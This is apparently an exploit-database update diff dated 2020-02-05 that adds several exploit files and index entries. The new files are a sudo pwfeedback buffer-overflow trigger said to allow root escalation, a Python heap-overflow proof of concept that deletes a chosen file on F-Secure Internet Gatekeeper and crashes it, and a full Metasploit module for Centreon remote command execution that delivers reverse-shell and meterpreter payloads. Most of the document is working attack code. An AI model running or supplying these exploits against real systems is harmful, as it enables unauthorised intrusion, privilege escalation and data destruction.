DB: 2020-02-05

5 changes to exploits/shellcodes

Sudo 1.8.25p - Buffer Overflow
Centreon 19.10.5 - 'Pollers' Remote Command Execution (Metasploit)
F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC)

exploits/hardware/webapps/47958.txt

@@ -6,7 +6,7 @@
 # Version: TP-Link TP-SG105E V4
 # Tested on: TP-SG105E V4 1.0.0 Build 20181120
 # Patch from vendor : https://static.tp-link.com/2020/202001/20200120/TL-SG105Ev4.0_en_1.0.0_[20200119-rel.52079]_up.zip
-# CVE : N/A
+# CVE : CVE-2019-16893
 
 # TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot
 # The TP-Link TP-SG105E is a "5-Port Gigabit Easy Smart Switch".

exploits/linux/local/47995.txt

@@ -0,0 +1,33 @@
+# Title: Sudo 1.8.25p - Buffer Overflow
+# Date: 2020-01-30
+# Author: Joe Vennix
+# Software: Sudo
+# Versions: Sudo versions prior to 1.8.26
+# CVE: CVE-2019-18634
+# Reference: https://www.sudo.ws/alerts/pwfeedback.html
+
+# Sudo's pwfeedback option can be used to provide visual feedback when the user is inputting 
+# their password. For each key press, an asterisk is printed. This option was added in 
+# response to user confusion over how the standard Password: prompt disables the echoing 
+# of key presses. While pwfeedback is not enabled by default in the upstream version of sudo,
+# some systems, such as Linux Mint and Elementary OS, do enable it in their default sudoers files.
+
+# Due to a bug, when the pwfeedback option is enabled in the sudoers file, a user may be able to trigger a stack-based buffer overflow.
+# This bug can be triggered even by users not listed in the sudoers file. There is no impact unless pwfeedback has been enabled.
+
+The folowing sudoers configuration is vulnerable:
+
+    $ sudo -l
+    Matching Defaults entries for millert on linux-build:
+	insults, pwfeedback, mail_badpass, mailerpath=/usr/sbin/sendmail
+
+    User millert may run the following commands on linux-build:
+	(ALL : ALL) ALL
+
+# Exploiting the bug does not require sudo permissions, merely that pwfeedback be enabled. 
+# The bug can be reproduced by passing a large input to sudo via a pipe when it prompts for a password.
+
+    $ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
+    Password: Segmentation fault
+
+If pwfeedback is enabled in sudoers, the stack overflow may allow unprivileged users to escalate to the root account.

exploits/linux/webapps/47996.py

@@ -0,0 +1,62 @@
+# Title: F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC)
+# Date: 2020-01-30
+# Author: Kevin Joensen
+# Vendor: F-Secure
+# Software: https://www.f-secure.com/en/business/downloads/internet-gatekeeper
+# CVE: N/A
+# Reference: https://blog.doyensec.com/2020/02/03/heap-exploit.html
+
+from pwn import *
+import time
+import sys
+
+
+
+def send_payload(payload, content_len=21487483844, nofun=False):
+    r = remote(sys.argv[1], 9012)
+    r.send("POST / HTTP/1.1\n")
+    r.send("Host: 192.168.0.122:9012\n")
+    r.send("Content-Length: {}\n".format(content_len))
+    r.send("\n")
+    r.send(payload)
+    if not nofun:
+        r.send("\n\n")
+    return r
+
+
+def trigger_exploit():
+    print "Triggering exploit"
+    payload = ""
+    payload += "A" * 12             # Padding
+    payload += p32(0x1d)            # Fast bin chunk overwrite
+    payload += "A"* 488             # Padding
+    payload += p32(0xdda00771)      # Address of payload
+    payload += p32(0xdda00771+4)    # Junk
+    r = send_payload(payload)
+
+
+
+def massage_heap(filename):
+        print "Trying to massage the heap....."
+        for x in xrange(100):
+            payload = ""
+            payload += p32(0x0)             # Needed to bypass checks
+            payload += p32(0x0)             # Needed to bypass checks
+            payload += p32(0xdda0077d)      # Points to where the filename will be in memory
+            payload += filename + "\x00"
+            payload += "C"*(0x300-len(payload))
+            r = send_payload(payload, content_len=0x80000, nofun=True)
+            r.close()
+            cut_conn = True
+        print "Heap massage done"
+
+
+if __name__ == "__main__":
+    if len(sys.argv) != 3:
+        print "Usage: ./{} <victim_ip> <file_to_remove>".format(sys.argv[0])
+        print "Run `export PWNLIB_SILENT=1` for disabling verbose connections"
+        exit()
+    massage_heap(sys.argv[2])
+    time.sleep(1)
+    trigger_exploit()
+    print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2])

exploits/php/webapps/47989.php

@@ -7,7 +7,7 @@
 # Software Link: https://www.phplist.org/download-phplist/
 # Version: 3.5.0
 # Tested on: Linux
-# CVE : N/A
+# CVE : CVE-2020-8547
 
 Background of the Vulnerability :
 

exploits/php/webapps/47994.rb

@@ -0,0 +1,311 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Centreon Poller Authenticated Remote Command Execution',
+      'Description' => %q{
+        TODO
+      },
+      'Author' => [
+        'Omri Baso', # discovery
+        'Fabien Aunay', # discovery
+        'mekhalleh (RAMELLA Sébastien)' # this module
+      ],
+      'References' => [
+        # TODO: waiting for CVE
+        ['EDB', '47977']
+      ],
+      'DisclosureDate' => '2020-01-27',
+      'License' => MSF_LICENSE,
+      'Platform' => ['linux', 'unix'],
+      'Arch' => [ARCH_CMD, ARCH_X64],
+      'Privileged' => true,
+      'Targets' => [
+        ['Reverse shell (In-Memory)',
+          'Platform' => 'unix',
+          'Type' => :cmd_unix,
+          'Arch' => ARCH_CMD,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'cmd/unix/reverse_bash'
+          }
+        ],
+        ['Meterpreter (Dropper)',
+          'Platform' => 'linux',
+          'Type' => :meterpreter,
+          'Arch' => ARCH_X64,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+            'CMDSTAGER::FLAVOR' => 'curl' # illegal characters: `~$^&"|'<>
+          }
+        ]
+      ],
+      'DefaultTarget' => 0,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'Reliability' => [REPEATABLE_SESSION],
+        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+      }
+    ))
+
+    register_options([
+      OptString.new('PASSWORD', [true, 'The Centreon Web panel password to authenticate with']),
+      OptString.new('TARGETURI', [true, 'The URI of the Centreon Web panel path', '/centreon']),
+      OptString.new('USERNAME', [true, 'The Centreon Web panel username to authenticate with'])
+    ])
+  end
+
+  def create_new_poller(poller_name, command_id)
+    print_status("Create new poller entry on the target.")
+    token = get_token(normalize_uri(target_uri.path, 'main.get.php'), {'p' => '60901'})
+    return false unless token
+
+    response = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'main.get.php?p=60901'),
+      'cookie' => @cookies,
+      'partial' => true,
+      'vars_post'   => {
+        'name' => poller_name,
+        'ns_ip_address' => '127.0.0.1',
+        'localhost[localhost]' => '1',
+        'is_default[is_default]' => '0',
+        'remote_id' => '',
+        'ssh_port' => '22',
+        'remote_server_centcore_ssh_proxy[remote_server_centcore_ssh_proxy]' => '1',
+        'engine_start_command' => 'service centengine start',
+        'engine_stop_command' => 'service centengine stop',
+        'engine_restart_command' => 'service centengine restart',
+        'engine_reload_command' => 'service centengine reload',
+        'nagios_bin' => '/usr/sbin/centengine',
+        'nagiostats_bin' => '/usr/sbin/centenginestats',
+        'nagios_perfdata' => '/var/log/centreon-engine/service-perfdata',
+        'broker_reload_command' => 'service cbd reload',
+        'centreonbroker_cfg_path' => '/etc/centreon-broker',
+        'centreonbroker_module_path' => '/usr/share/centreon/lib/centreon-broker',
+        'centreonbroker_logs_path' => '/var/log/centreon-broker',
+        'centreonconnector_path' => '',
+        'init_script_centreontrapd' => 'centreontrapd',
+        'snmp_trapd_path_conf' => '/etc/snmp/centreon_traps/',
+        'pollercmd[0]' => command_id,
+        'clone_order_pollercmd_0' => '',
+        'ns_activate[ns_activate]' => '1',
+        'submitA' => 'Save',
+        'id' => '',
+        'o' => 'a',
+        'centreon_token' => token
+      }
+    )
+    return false unless response
+
+    return true
+  end
+
+  def execute_command(command, opts = {})
+    cmd_name = rand_text_alpha(8..42)
+    poller_name = rand_text_alpha(8..42)
+
+    ## Register a miscellaneous command.
+    print_status("Upload command payload on the target.")
+    token = get_token(normalize_uri(target_uri.path, 'main.get.php'), {'p' => '60803', 'type' => '3'})
+    return false unless token
+
+    response = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'main.get.php?p=60803&type=3'),
+      'cookie' => @cookies,
+      'partial' => true,
+      'vars_post'   => {
+        'command_name' => cmd_name,
+        'command_type[command_type]' => '3',
+        'command_line' => command,
+        'resource' => '$CENTREONPLUGINS$',
+        'plugins' => '/Centreon/SNMP',
+        'macros' => '$ADMINEMAIL$',
+        'command_example' => '',
+        'listOfArg' => '',
+        'listOfMacros' => '',
+        'connectors' => '',
+        'graph_id' => '',
+        'command_activate[command_activate]' => '1',
+        'command_comment' => '',
+        'submitA' => 'Save',
+        'command_id' => '',
+        'type' => '3',
+        'o' => 'a',
+        'centreon_token' => token
+      }
+    )
+    return false unless response
+
+    ## Create new poller to serve the payload.
+    create_new_poller(poller_name, get_command_id(cmd_name))
+    poller_id = get_poller_id(poller_name)
+
+    ## Export configuration to reload to trigger the exploit.
+    unless poller_id.nil?
+      restart_exportation(poller_id)
+    end
+  end
+
+  def get_auth
+    print_status("Send authentication request.")
+    token = get_token(normalize_uri(target_uri.path, 'index.php'))
+    unless token.nil?
+      response = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'cookie' => @cookies,
+        'vars_post'  => {
+          'useralias' => datastore['USERNAME'],
+          'password' => datastore['PASSWORD'],
+          'submitLogin' => 'Connect',
+          'centreon_token' => token
+        }
+      )
+      return false unless response
+
+      if response.redirect?
+        if response.headers['location'].include?('main.php')
+          print_status('Successful authenticated.')
+          @cookies = response.get_cookies
+          return true
+        end
+      end
+    end
+
+    print_bad('Your credentials are incorrect.')
+    return false
+  end
+
+  def get_command_id(cmd_name)
+    response = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'main.get.php'),
+      'cookie' => @cookies,
+      'vars_get' => {
+          'p' => '60803',
+          'type' => '3'
+      }
+    )
+    return nil unless response
+
+    href = response.get_html_document.at("//a[contains(text(), \"#{cmd_name}\")]")['href']
+    return nil unless href
+
+    id = href.split('?')[1].split('&')[2].split('=')[1]
+    return id unless id.empty?
+
+    return nil
+  end
+
+  def get_poller_id(poller_name)
+    response = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'main.get.php'),
+      'cookie' => @cookies,
+      'vars_get' => {'p' => '60901'}
+    )
+    return nil unless response
+
+    href = response.get_html_document.at("//a[contains(text(), \"#{poller_name}\")]")['href']
+    return nil unless href
+
+    id = href.split('?')[1].split('&')[2].split('=')[1]
+    return id unless id.empty?
+
+    return nil
+  end
+
+  def get_session
+    response = send_request_cgi(
+      'method' => 'HEAD',
+      'uri' => normalize_uri(target_uri.path, 'index.php')
+    )
+    cookies = response.get_cookies
+    return cookies unless cookies.empty?
+  end
+
+  def get_token(uri, params = {})
+    ## Get centreon_token value.
+    request = {
+      'method' => 'GET',
+      'uri' => uri,
+      'cookie' => @cookies
+    }
+    request = request.merge({'vars_get' => params}) unless params.empty?
+    response = send_request_cgi(request)
+
+    return nil unless response
+    return response.get_html_document.at('input[@name="centreon_token"]')['value']
+  end
+
+  def restart_exportation(poller_id)
+    print_status("Reload the poller to trigger exploitation.")
+    token = get_token(normalize_uri(target_uri.path, 'main.get.php'), {'p' => '60902', 'poller' => poller_id})
+
+    vprint_status(' -- Generating files.')
+    unless token.nil?
+      response = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'generateFiles.php'),
+        'cookie' => @cookies,
+        'vars_post' => {
+          'poller' => poller_id,
+          'debug' => 'true',
+          'generate' => 'true'
+        }
+      )
+      return nil unless response
+
+      vprint_status(' -- Restarting engine.')
+      response = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'restartPollers.php'),
+        'cookie' => @cookies,
+        'vars_post' => {
+          'poller' => poller_id,
+          'mode' => '2'
+        }
+      )
+      return nil unless response
+
+      vprint_status(' -- Executing command.')
+      response = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'postcommand.php'),
+        'cookie' => @cookies,
+        'vars_post' => {'poller' => poller_id}
+      )
+      return nil unless response
+    end
+  end
+
+  def check
+    # TODO: Detection by version number (waiting to know the impacted versions).
+  end
+
+  def exploit
+    ## TODO: check
+
+    @cookies = get_session
+    logged = get_auth unless @cookies.empty?
+    if logged
+      case target['Type']
+      when :cmd_unix
+        execute_command(payload.encoded)
+      when :meterpreter
+        execute_command(generate_cmdstager.join)
+      end
+    end
+  end
+
+end

files_exploits.csv

@@ -10925,6 +10925,7 @@ id,file,description,date,author,type,platform,port
 47965,exploits/windows/local/47965.py,"Torrent 3GP Converter 1.51 - Stack Overflow (SEH)",2020-01-27,boku,local,windows,
 47974,exploits/windows/local/47974.txt,"XMLBlueprint 16.191112 - XML External Entity Injection",2020-01-29,"Javier Olmedo",local,windows,
 47975,exploits/windows/local/47975.c,"Microsoft Windows 10 - Theme API 'ThemePack' File Parsing",2020-01-29,"Eduardo Braun Prado",local,windows,
+47995,exploits/linux/local/47995.txt,"Sudo 1.8.25p - Buffer Overflow",2020-02-04,"Joe Vennix",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42289,3 +42290,5 @@ id,file,description,date,author,type,platform,port
 47990,exploits/java/webapps/47990.py,"Jira 8.3.4 - Information Disclosure (Username Enumeration)",2020-02-03,"Mufeed VH",webapps,java,
 47991,exploits/hardware/webapps/47991.py,"Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection",2020-02-03,"Cosmin Craciun",webapps,hardware,
 47992,exploits/php/webapps/47992.txt,"School ERP System 1.0 - Cross Site Request Forgery (Add Admin)",2020-02-03,J3rryBl4nks,webapps,php,
+47994,exploits/php/webapps/47994.rb,"Centreon 19.10.5 - 'Pollers' Remote Command Execution (Metasploit)",2020-02-04,mekhalleh,webapps,php,
+47996,exploits/linux/webapps/47996.py,"F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC)",2020-02-04,"Kevin Joensen",webapps,linux,